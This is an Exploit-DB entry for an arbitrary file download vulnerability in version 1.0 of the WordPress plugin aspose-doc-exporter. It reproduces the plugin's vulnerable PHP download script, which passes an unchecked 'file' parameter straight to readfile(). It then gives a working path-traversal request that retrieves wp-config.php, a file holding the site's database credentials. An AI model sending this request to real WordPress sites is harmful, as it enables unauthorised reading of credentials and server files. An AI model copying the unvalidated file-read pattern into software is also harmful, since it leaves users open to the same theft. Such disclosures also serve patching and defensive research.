WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download

EDB-ID:

36559

CVE:



Author:

ACC3SS

Type:

webapps


Platform:

PHP

Date:

2015-03-30


|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
 |-------------------------------------------------------------------------|
 | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability |
 | [+] Exploit Author: Ashiyane Digital Security Team |
 | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
 | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
 | [+] Tested on: Windows,Linux |
 | [+] Date : 2015-03-28
 | [+] Discovered By : ACC3SS
 |-------------------------------------------------------------------------|
 | [+] Exploit: |
 | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php |
 | [+] Vulnerable Code :

<?php

$file = $_GET['file'];

$file_arr = explode('/',$file);

$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");

header ("Content-disposition: attachment; filename=".$file_name.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>


 | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
 | [+]
 | [+] Examples :  http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
 |-------------------------------------------------------------------------|
 |*||*||*||*||*||*||*||*||*||*||*||*||*